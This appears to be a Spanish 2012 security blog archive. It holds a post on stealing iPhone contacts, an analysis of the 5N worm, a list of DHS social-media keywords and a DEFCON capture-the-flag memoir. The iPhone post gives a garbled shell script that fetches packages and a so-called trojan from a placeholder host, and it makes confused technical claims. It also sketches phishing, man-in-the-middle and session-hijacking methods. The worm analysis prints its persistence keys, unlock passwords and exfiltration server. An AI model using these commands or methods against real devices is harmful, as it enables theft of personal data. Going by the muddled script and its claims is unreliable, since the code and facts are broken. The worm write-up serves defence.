jueves, 29 de noviembre de 2012

Sabes como los hackers obtienen la agenda de tu ipad o iphone?

Este es un ejemplo de diversos ataques con el fin de obtener la agenda telefónica de un ipod o ipad.
El escrito es puramente documental y con la finalidad de prevenir a los usuarios de este tipo de ataques.
Lo primero que hace un ciberdelincuente es conseguir una herramienta de empaquetado APT (Advance Packing Tool) hecho con C o C++ para debian, con la finalidad de obtener el UDID del iphone y una dirección de correo registrada.
(Aquí solo parte del código)
# Instala treemelo
apt-get update
apt-get dist-upgrade
apt-get install wget subversion
# Descargamos la version de ruby y sus dependencias
wget http://xxxx.com/repo/debs/ruby_1.9.2-p180-1-1_iphoneos-arm.deb
wget http://xxxx.com/repo/debs/iconv_1.14-1_iphoneos-arm.deb
wget http://xxxx.com/repo/debs/zlib_1.2.3-1_iphoneos-arm.deb
# Instala ponchalo
dpkg -i iconv_1.14-1_iphoneos-arm.deb
dpkg -i zlib_1.2.3-1_iphoneos-arm.deb
dpkg -i ruby_1.9.2-p180-1-1_iphoneos-arm.deb
# Borra ponchalo
rm -rf *.deb
#Hacemos una variable privada a fin de enganchar los datos
Dpget mail.mai cat var
cd /private/var
#descargan un troyano tipo FinSpy del sitio
svn co https://www.xxxx.com/svn/framework3/trunk/ msf3
cd msf3/
# Corren el rubi descargado anteriormente y reportara la lista de contactos al directorio creado
ruby msfconsole
etc
etc
etc
Otra forma es con un APT de una Fake CA y un mitm: Ya que averiguan su correo y le envian una fake CA para luego hacer un mitm con un rogue AP cercano. Después le mandan a un portal cautivo que le pedira su contraseña de Apple iTunes. Con ella accederan a su backup en iCloud y descargaran los contactos.
Otra forma es
Con un JailOwnMe: si la victima no tiene actualizado el software de su iPhone es vulnerable a los exploit de comex. Le mandan un tweet con un link a un PDF muy tentativo y cuando lo abra tendran una shell con JailOwnMe que permitirá acceder a sus contactos.
También puede ser con un Address Bar Spoofing: si el usuario no tiene iOS 5.1.1 o iOS 6 le envian un link al twitter cuando está twitteando para que entre en un phishing hecho con address bar spoofing y le robaran el password de iCloud. Desde allí descargaran su agenda.
O Si la victima tiene sincronizado su Gmail con su iPhone: Un Phishing burdo por correo electrónico o Twitter, la victima pone su password y se accederá a los contactos de Gmail para descargar su agenda en un csv.
Hasta con un backup involuntario: Si la victima conecta su terminal a un equipo para que se cargue la batería, en un descuido le hacen un backup con el iTunes.
Un programa de ForenseTeniendo acceso físico al dispositivo, lo ponchamos a un Oxygen Forensics y en 10 minutos volcaran todo el terminal un usb.
O a través de un hijacking de Facebook: si la victima tiene iOS 6, ha sincronizado su iPhone con Facebook pero se conecta desde redes WiFi inseguras y le capturan una cookie de sesión de Facebook. Le hacen un hijacking a su cuenta y se descargan todos los contactos.
Inclusive preguntando a Siri: si la victima tiene un iPhone 4S con Siri activado, alguien tiene acceso al dispositivo y se dedica a preguntarle a Siri todos los teléfonos de la agenda que le interesan.
Por último JavaScript Botnet: Si el iPhone de la victima se conecta a una Rogue WiFi que se llama Public o Free. la victima se había conectado anteriormente a una red llamada así y como iPhone no comprueba el BSSID se come una JavaScript Botnet con la que le hacen un Phishing.
Que recomiendo para prevenir:
1.- Tener en todo momento apagado el bluetoot si no se usa
2.- Haga caso omiso a los mensajes directos con links y más si son descargables
3.- Cualquier apertura y cerrado de pantallas anormal poner el dispositivo en modo avión o apagarlo completamente de inmediato.
4.-No sincronice su Iphone a Facebook desde redes desconocidas
5.- No por ser presumido actives siri para ver como hablas con tu equipo, mejor usa los métodos convencionales para consulta.
6.- Cuidado en los sitios que ingresas y el software que descargas puedes ser victima de suplantación fácilmente.
By @edgarulloa

domingo, 4 de noviembre de 2012

El virus 5N

Un nuevo virus apodado como 5N, podría llevar a cabo acciones dañinas en los equipos infectados para, entre otras cosas, recopilar información o impedir su utilización a partir del 5 de Noviembre 2012.


Recursos afectados

Equipos con sistema operativo Windows xp, windows 7, windows 8


Solución

Para detectar si un equipo se encuentra infectado para un usuario concreto, bastaría con iniciar sesión con el mismo usuario y pulsar las teclas "Shift" + "Ctrl" + "Alt" + "F7" y comprobar si aparece una ventana que solicita contraseña. Dicha ventana es invocada por el propio virus y permite introducir una contraseña para detener las acciones del mismo en el sistema. En el caso de introducir una contraseña incorrecta 3 veces procede a apagar el equipo.
Por tanto, si se mostrara dicha ventana a la hora de pulsar la combinación de teclas descrita anteriormente, serían síntomas de infección.
Otra opción para detectar si su equipo está infectado es iniciar la utilidad de símbolo del sistema a (Inicio > Ejecutar > cmd) y ejecutar los siguientes comandos :
  • dir %SystemDrive%\ /a /b /s | findstr -i drmvclt.exe
  • dir D:\ /a /b /s | findstr -i drmvclt.exe
Ventana comandos Windows
El segundo comando habrá que ejecutarlo en el caso de que el ordenador tenga más de una unidad: D:\, E:\, F:\, etc. Habría que cambiar la letra D:\ por la que corresponda.
En el caso de mostrar alguna salida los comandos anteriores, las cuales se corresponderían con las rutas en el sistema donde se encuentra almacenado el virus drmvclt.exe, se deberán anotar las mismas para posteriormente proceder a su eliminación.

Detalles
Se ha descubierto un nuevo virus que estaría programado para impedir la utilización del equipo el día 5 de Noviembre.
El virus es capaz de reproducirse a través de dispositivos extraíbles (pen drives, discos duros externos, etc.) pudiendo así infectar aquellos equipos en los que se conecta el dispositivo extraíble. Una vez infectado el equipo, el virus modifica su configuración (el registro de Windows) para garantizar su permanencia en él. Además, también es capaz de recopilar información sobre el ordenador comprometido (como por ejemplo el nombre, la fecha actual, etc.) para enviarla posteriormente a servidores remotos.
En el caso de conectar un dispositivo extraíble en un ordenador infectado (por ejemplo, un USB de almancenamiento), el virus lo infectará. Para ello, marcará todas las carpetas que encuentre en el directorio raíz del dispositivo como ocultas con el fin de que no sean visibles para el usuario. Además, creará tantas copias de sí mismo como carpetas haya encontrado manteniendo el nombre de las originales. De esta forma cuando un usuario conecte un dispositivo USB infectado en su ordenador no verá las carpetas originales sino las carpetas generadas por el virus. Estas carpetas son realmente una copia del virus (un fichero ejecutable) de forma que cuando se haga clic en alguna de ellas para ver su contenido, el virus infectará el equipo de forma totalmente transparente al usuario. Además, para evitar sospechas, una vez el usuario haga clic en la carpeta falsa, el virus mostrará el contenido del directorio legítimo.
Virus 5n (CCN-CERT)
 
Cuando el virus detecte la fecha del 5 de Noviembre mostrará multitud de botones de apagado en puntos aleatorios de la pantalla de forma que si el usuario pulsa en alguno de ellos el equipo se apaga. El virus también puede modificar el fondo de escritorio.


Subrutina de fecha:


.text:004022FC ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦

.text:004022FC

.text:004022FC ; Attributes: thunk

.text:004022FC

.text:004022FC ; int __stdcall GetDateFormatA(LCID Locale,DWORD dwFlags,const SYSTEMTIME *lpDate,LPCSTR lpFormat,LPSTR lpDateStr,int cchDate)

.text:004022FC GetDateFormatA  proc near               ; CODE XREF: sub_401250+2C0p

.text:004022FC                                         ; sub_401250+2D9p

.text:004022FC                 jmp     ds:__imp_GetDateFormatA

.text:004022FC GetDateFormatA  endp

 

Kernel call:

.idata:00405238 ; int __stdcall __imp_GetDateFormatA(LCID Locale,DWORD dwFlags,const SYSTEMTIME *lpDate,LPCSTR lpFormat,LPSTR lpDateStr,int cchDate)

.idata:00405238                 extrn __imp_GetDateFormatA:dword

.idata:00405238                                         ; DATA XREF: GetDateFormatAr

 

Con esto asegura que:
Los ataques comenzaran desde el día 5 de noviembre 2012

El código llega en un ejecutable llamado 5N.exe (Aunque podría cambiar). Cuando se instala, genera varios ficheros, siendo elñ principal drmvclt.exe. Este ejecutable, presenta un icono similar a una carpeta de Windows, con el fin de intentar pasar desapercibido en el equipo.
El codigo realiza las siguientes acciones:
  • Crea una serie de archivos en el sistema comprometido.
  • Crea una en el registro de Windows para garantizar su permanencia en cada reinicio.
  • Obtiene datos de la instalación del sistema.
  • Se conecta al dominio ftp.drivehq.com para enviar la información capturada.
  • Infecta todos los dispositivos extraíbles que se conecten al equipo.
  • Impide la utilización normal del equipo los días 5 de noviembre.


La infección en el equipo se produce al ejecutar el fichero drmvclt.exe. Una vez ejecutado realiza las siguientes acciones en el equipo víctima:
  1. Se copia a sí mismo en el sistema.
  2. Modifica el registro de Windows para iniciarse de forma automática en el arranque del sistema.
  3. Infecta los dispositivos extraíbles insertados para infectar otros equipos.
  4. Recopila información del sistema y la manda a un servidor remoto
A continuación se describen estos 4 pasos:
1.- El gusano se copia a sí mismo en el sistema. El directorio depende de los permisos del usuario infectado, por lo que intenta copiarse en distintas rutas. En caso de no poder copiarse en la primera, lo intenta en la segunda, etc. Las posibles rutas en las que intenta copiarse son las siguientes (Y en este orden):
  1. C:\WINDOWS\system32
  2. C:\Documents and Settings\All Users\
  3. %USERPROFILE%\
  4. D:\
2.- El gusano modifica el registro de Windows con el fin de asegurarse su ejecución en cada reinicio del equipo, utilizando la ruta donde ha sido copiado ([RUTA_EJECUTABLE]). Intenta crear las siguientes claves, en el orden indicado:
  1. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\run\"drmvclt"="[RUTA_EJECUTABLE]"
  2. HKCU\SOFTWARE\ Microsoft\Windows\CurrentVersion\run\"drmvclt"="[RUTA_EJECUTABLE]"
3.- El gusano se propaga a todas las unidades extraíbles que se conectan a sistema, tal y como se explica en la sección de propagación.


4.- Al inicio de su ejecución, el gusano recopila la siguiente información del equipo infectado:
  • Nombre de equipo
  • ProductId
  • ProductName
  • RegisteredOrganization
  • RegisteredOwner
  • Fecha actual
Esta información se guarda en un fichero en una de las siguientes rutas, en el orden indicado:
  1. C:\[ProductId]_[NombreEquipo].cfg
  2. D:\[ProductId]_[NombreEquipo].txt
Dicho archivo es enviado mediante FTP al servidor "ftp.drivehq.com", en el caso de que el identificador de Producto (ProductId) sea distinto a "55274-641-6828477-23781" y a "00359-OEM-8992687-007".
De esta manera, si se infecta el equipo con un usuario con privilegios de administración la infección afectará a todos los usuarios que inicien sesión en el Sistema, y en cambio, si el usuario no tiene privilegios, sólo afectará a este usuario.
El archivo una vez enviado es finalmente eliminado por el propio código dañino.


Funcionamiento detallado



Al ejecutarse, lo primero que hace el programa es comprobar si se está ejecutando en el directorio raíz de una unidad extraíble y si existe una carpeta con el mismo nombre que el archivo ejecutable, en cuyo caso abre una instancia del explorador de Windows con el contenido de dicha carpeta. Con ello el código dañino simula la apertura normal de las carpetas de los dispositivos infectados, pasando así inadvertida la infección del equipo a los ojos del usuario.
Posteriormente comprueba si ya existe otro proceso del propio código dañino ejecutándose en el sistema, en cuyo caso finaliza la ejecución. Para ello consulta los nombres de los procesos en ejecución, y los compara con las cadenas ‘drmvclt’, ‘5N’ y ‘5N.vshost’. Además, en caso de estar ejecutándose desde el directorio/carpeta raíz de una unidad extraíble, los compara también con los nombres de las carpetas existentes en el directorio/carpeta raíz de dicha unidad.
A continuación recopila la información del sistema, almacenándola en un archivo que posteriormente envía mediante FTP al servidor "ftp.drivehq.com", tal y como se explicó anteriormente.
El gusano está en todo momento monitorizando los eventos de conexión/desconexión de dispositivos extraíbles, para proceder o no a la infección del dispositivo extraíble.
El código dañino contiene una serie de temporizadores, componentes que ejecutan una función concreta cada cierto tiempo. A continuación se indican las funciones de los temporizadores más relevantes que se han encontrado dentro del código dañino:
  1. TIMER1Se activa durante la carga inicial del programa. Comprueba si la fecha actual del equipo es 5 de noviembre y si el identificador de producto "ProductId "del sistema es distinto de ‘55274-641-6828477-23781’, en cuyo caso llama al proceso ‘destino_final’, que activa los temporizadores 3, 4 y 6 (Timer3, Timer4 y Timer6), reproduciendo a continuación la música que se encuentra contenida en el ejecutable de manera cíclica hasta que se apague el equipo.
    Por otra parte, monitoriza si el usuario realiza la pulsación conjunta de las teclas ‘Ctrl’ + ‘Alt’ + ‘Shift’ + ‘F7’, en cuyo caso muestra una ventana de acceso en la que pide una contraseña, deteniendo el temporizador Timer5.
    En caso de introducir la contraseña ‘dpmjaca’, activa Timer3, Timer4 y Timer6. En caso de introducir la contraseña ‘dpmjaca57’ se cierra el programa, y en caso de introducir 3 veces una contraseña no contemplada, procede a apagar el equipo.
  2. TIMER2Tiene como función la de asegurarse la permanencia del código dañino en el sistema. Para ello se intenta copiar a sí mismo en las rutas ya mencionadas, e intenta crear las claves de registro necesarias para su inicio automático con el sistema.
  3. TIMER3Se activa cuando se cumplen las condiciones impuestas por Timer1, siendo su función la de guardar la imagen que se encuentra contenida en el ejecutable (que presenta una careta de Anonymous) en una de las siguientes rutas, según los permisos del usuario, y de sustituir el fondo de escritorio por dicha imagen.
    1. C:\WINDOWS\system32
    2. C:\Documents and Settings\All Users\
    3. %USERPROFILE%\
    4. D:\
    Por último, procede a realizar la apertura de la unidad de CD-ROM/DVD.
  4. TIMER4Su función es la de monitorizar la lista de procesos en ejecución y eliminar todos aquellos procesos cuyo nombre sea ‘taskmgr’, cerrando así la ventana de administración de tareas de Windows. De esta manera evita que el usuario elimine y/o vea el proceso correspondiente al código dañino.
  5. TIMER5Tiene como función la de mostrar repetidamente botones de apagado del sistema en puntos aleatorios de la pantalla o/y en aquellos lugares donde se encuentra posicionado el puntero del ratón, de tal forma que si el usuario pulsa alguno de ellos el equipo se apaga.
  6. TIMER6Se encarga de iniciar y detener Timer5, así como cambiar sus intervalos de actuación de manera cíclica, provocando que los botones creados por Timer5 se generen a distintos intervalos de tiempo.
 

martes, 6 de marzo de 2012

Las palabras favoritas de Homeland

El Departamento de Seguridad Nacional de EE.UU (Department of Homeland Security) controla todas las actualizaciones de los usuarios que se realizan en las redes sociales, fundamentalmente enFacebook y Twitter. Su objetivo es, según ha publicado hoy la web animalnewyork.com, el descubrir aquellos “Artículos de interés” (IOI) que puedan amenazar la seguridad nacional.
La fuente original de esta información parece ser un documento interno emitido por el Department of Homeland Security. En él se orienta a los responsables de esta actividad de espionaje en las redes socialescuáles son aquellos términos o palabras que deberán ser vigilados de cerca en cada actualización de los usuarios en sus respectivos perfiles personales, todo ello en tiempo real.
Según reconoce Joel Johnson, autor del artículo que divulga esta actividad de espionaje del Gobierno de EE.UU, el Department of Homeland Security mantiene una política de privacidad que intenta separar la información personal, Personally Identifiable Information (PII), de los Tweets que son agregados cada segundo o de las actualizaciones de los usuarios de Facebook.
Sin embargo, entre el contenido que sí se fijan los especialistas del Department of Homeland Security están aquellos que se relacionan con las declaraciones de funcionarios de alto rango del Gobierno de EE.UU, o cualquier otro gobierno extranjero; los funcionarios públicos o del sector privado, y sus respectivos portavoces; los nombres de famosos, presentadores de televisión, reporteros en lugares de siniestro; además de los nombres de terroristas, líderes de cárteles de la droga u otra persona que sea de interés de Seguridad Nacional.
Por otra parte, se dispone de una lista de términos o palabras claves que son monitoreados las 24 horas en los muros o TimeLine de las diversas redes sociales, sobre todo en Twitter. Esta lista de palabras claves está dividida en secciones y entre las principales temáticas que la componen están:
  1. Agencias del Gobierno de EE.UU. Las palabras claves vigiladas son: Departamento de Seguridad Nacional, Federal Emergency Management Agency, Secret Service  o el Centro Nacional de Operaciones, entre otras instituciones.
  2. Seguridad Interior. Las palabras que levantan sospechas son: asesinato, atacar, seguridad nacional, perforar, policías, recuperación, bomba sucia, milicia, disparos, rehén, explosión, pandillas y estado de emergencia entre otras.
  3. Materiales peligrosos y nucleares: materiales peligrosos, nuclear, derrame de productos químicos, paquete sospechoso, tóxico, nube, pluma, gas, sarín, Corea del Norte ántrax, radiación o radiactivo, entre otros.
  4. Preocupación por la salud +H1N1: brote, contaminación, explosión, virus, bacteria, ébola, aviar, H5N1, los síntomas, mutación o pandemia, entre otros.
  5. Infraestructura de seguridad: aeropuerto, infraestructura informática, metro, telecomunicaciones, avión, autoridades portuarias, puerto, muelle, puente o líneas de energía, entre otros.
  6. Violencia en la frontera sudoeste: cárteles de la droga, violencia, banda, droga, cocaína, marihuana, México, cárcel, Sinaloa, Tijuana, Juárez, El Paso, Ciudad Juárez, ejército mexicano e inmigrantes ilegales, entre otros.
  7. Terrorismo: Terrorismo, Al Qaeda, terror, atacar, Irak, Pakistán, bomba sucia, atacar,  Hamás, las FARC, IRA, ETA, Hezbolá o ataque suicida, entre otros.
  8. Seguridad cibernética: botnet, malware, troyano, virus, spammer, phishing, ataques de fuerza bruta, ciber ataque, ciber terrorismo o Anonymous, entre otros.
Resumiendo, cuando alguno de nosotros escribe una de estas palabras claves que se incluyen en esta lista negra en alguno de nuestros muros de las cuentas que tenemos en las redes sociales de internet,fundamentalmente Facebook o Twitter, estamos exponiéndonos a que nuestros mensajes sean leídos o registrados por esta oficina de espionaje online del Gobierno de EE.UU; motivo por el cual debemos siempre estar atentos a lo que escribimos y qué palabras utilizamos en  esa escritura, no vaya a ser que un día nos confundan con algo peor, que puede pasar.
Como bien podemos apreciar, internet se hace cada día más peligrosa, sobre todo en torno al tema de nuestra privacidad online. A propósito, hoy la compañía Google Inc. ha puesto en práctica su nueva política de privacidad de los usuarios en la que toda la información se unirá en un solo campo. En horas de la mañana pude leer un documento en PDF, para ser más precisos, una carta, que desde las autoridades europeas le hacen llegar a la dirección de Google Inc.

Siganme  @edgarulloa

lunes, 20 de febrero de 2012

Memoria: La antesala a un concurso internacional de hackers

Mañana calurosa, el registro en el hall del Alexys Park en las Vegas da comienzo a uno de los eventos de hackers mas esperados del año, el famoso DEFCON 11.
Una mochila modesta con un par de laptops, tu rostro nerviosoy tu sentir a la espera de saber la hora de cuando te tocará tu turno y si podrás salir victorioso de la contienda, pues sabes que alli no van personas que solo cambian paginas web u obtienen tus passwords, te provocan overflow de memoria en tu laptop o inclusive te inhiben tu access point o ponen un key logger disfrazado, alli va gente que hace algo mucho mas alla y rayan en lo que se denominaba terrorismo informatico, cibercrimen o espionaje cibernético.
Grupos de jovenes reunidos en las pequeñas mesas de estar, todos alrededor de sus laptos, gente de muchas partes del mundo volcados alli, hackers, expertos en seguridad, policias encubiertos, agentes secretos y muchos más. Todos deseando lo mismo.. saber que nuevas vulnerabilidades hay.
Se publican las fechas de los eventos y la fecha esperada, Domingo 3 de agosto de 2003 de 1 a 3 pm Capture the Flag - Root Fu contest es anunciado.
Te diriges a la apertura del evento, una charla que dará el rey de la encriptación PGP Phil Zimmermann.
Poco a poco los grupos que participaran en el mismo evento que tú ya se juntan a fin de tratar de ver o entender cual será el objetivo, que tipos de firewalls o IDS se usaran para proteger la bandera que le dicen zanahoria en el evento.
Tienes temor de hablar sobre lo que hiciste en tu pasado y te dio la oportunidad de ser elegido para participar en el evento de esa magnitud, no sabes si la persona que esta sentada a tu lado es un hacker o un agente encubierto.
Nadie platica nada salvo los mismos grupos que van, te limitas a ver y tomar tus notas.
Buenas conferencias sobre vulnerabilidades todo el dia y el día siguiente se dan y llega el dia de tu evento.
/:00 am, la noche anterior dormiste muy poco, los nervios te consumieron de no saber cual es el reto a vencer, y trataste de practicar un poco con la red muy bien protegida que te dio el hotel.
Un par de conferencias se dan, una de ellas llamada "hacker la red invisible" y otra "virus metamorficos" llamaron mi atención y asistí a fin de pasar el rato y matar el nervio.
No terminó el ponente cuando me dirigí a la sala donde se llevará acabo la competencia.
Te preguntan si necesitas algo mas, una vez que otorgas tu mac address para matricularte enel access point que entra en la Vlan en donde participaras y la pregunta de siempre.. Usted solo? No tiene un equipo?. Solo te limitas a contestar, trabajo solo, no tengo equipo.
En una modesta mesa te encuentras y a tus alrededores con equipos de 3 a 4 personas, tus competidores tienen nombres muy hostiles o intimidantes, Imunix linux, sharkbait, netzero, inclusive algunos que hacen recordar los desbordamientos de buffer 0x00ff00, Dead Chamaleon y suzukiblaster entre los que recuerdo.
El manager del evento “Ghettohacker” pone el objetivo, extraer un archivo el cual estaba codificado al mero estilo “Enigma code” cuya base de calculo era el nombre del evento “defcon”.
La red estaba conformada por un firewall pix, un IDS y una pc que servia como honey pot en una dmz, de alli el servidor el cual tenia en alguna parte de su disco el archivo carrot.txt que deviese ser descifrado y postearlo al ghetto.
1:00 pm, comienza con el chicharrazo inicial, todos usamos los clasicos softwares para detección de red y enumeración a fin de determinar el acceso, la red esta blindada, el pix esta muy bien configurado y puertos como 21, 23  y 80 estan cerrados.
Al detectar este escenario lo unico que me quedó es plan B, la red inalambrica que aun se encontraba en pañales en ese año.
Un simple codigo WEP de encriptación es lo que me separaba de poder entrar a la configuración al access point cisco que utilizaron para gestionar la vlan.
La red 192.168.4.x asignada para esta competencia no me daba mas alternativas de penetración, sin embargo el servidor utilizado fue el mismo que se utilizará para el evento hacker jeopardi.
Con herramientas como walk chalk, cheops, sub7 y otras de creación propia me permitieron entrar al access point y encontrar la ip del servidor central la cual se ruteaba desde un equipo cisco.
El objetivo estaba directamente fuera del salón de clase, un ruteador que formaba las vlans de todo el evento y que podia ser accesado desde aquel access point.
Para poder pasar transparente a cualquier tipo de IDS, hice un tunel ARP y ejecutando loopcrack y jhonreaper gane el password local system, NetDDE me sirvio para ganar privilegios de system, la ejecución del obligado attrib -h -r *.* , dir *.txt /s y hubicando el archivo los servicios activos y protocolo NetBios activo en ese windows 2000 server me dio oportunidad de mandar mi agente ftp propietario con un Netcat atraves del backdoor que este software abria y pude traer el codiciado archivo con propiedades Hiden.
Eran las 14:32 cuando descifre aquel código y lo puse en la mesa del juez. “who's manage the information have the power” decia el archivo escrito con puros paquetes de 8 digitos.
Mi nickname fue registrado “Anomaly “ y la hora 14:33. inicialmente pude haber sido tequila, sin embargo paisanos mios ya lo tenian registrado con anterioridad.
Ya varios equipos habian entregado información, entonces al terminar el evento anuncian que fuy yo quien descifró y ganó la zanahoria.
Tuve que mostrar la forma como accesé al servidor y obtuve el archivo.
Mis contrincantes llegaron hasta el documento que despues descifraron alli mismo, pero no pudieron extraerlo.
Tras eso me llovieron invitaciones a eventos posteriores como el POSTECH-KAIST de Asia y el participar en firmas creadoras de software de seguridad.
El próximo año traté de llevar un sistema para esteganografiar wavs, o textos dentro de mp3, sin embargo por problemas de salud no asistí nuevamente a defcon.
 Para el año 2005 ya el mundo informático cambió, lo que hacias con herramientas en 2003 en ese año ya son inofensivas a los sistemas de seguridad y nuevamente tratar de encontrar las vulnerabilidades requieren de tiempo. Tiempo que dejas de tener mientras estas laborando en alguna empresa.
Mi ultima participación ya como oyente fue en el pasado Shmoocon 2012, este evento me muestro que siempre habrá alguien con el tiempo y el oscio para tratar de vulnerar lo que los equipos de seguridad dicen tener protegido.
Edgar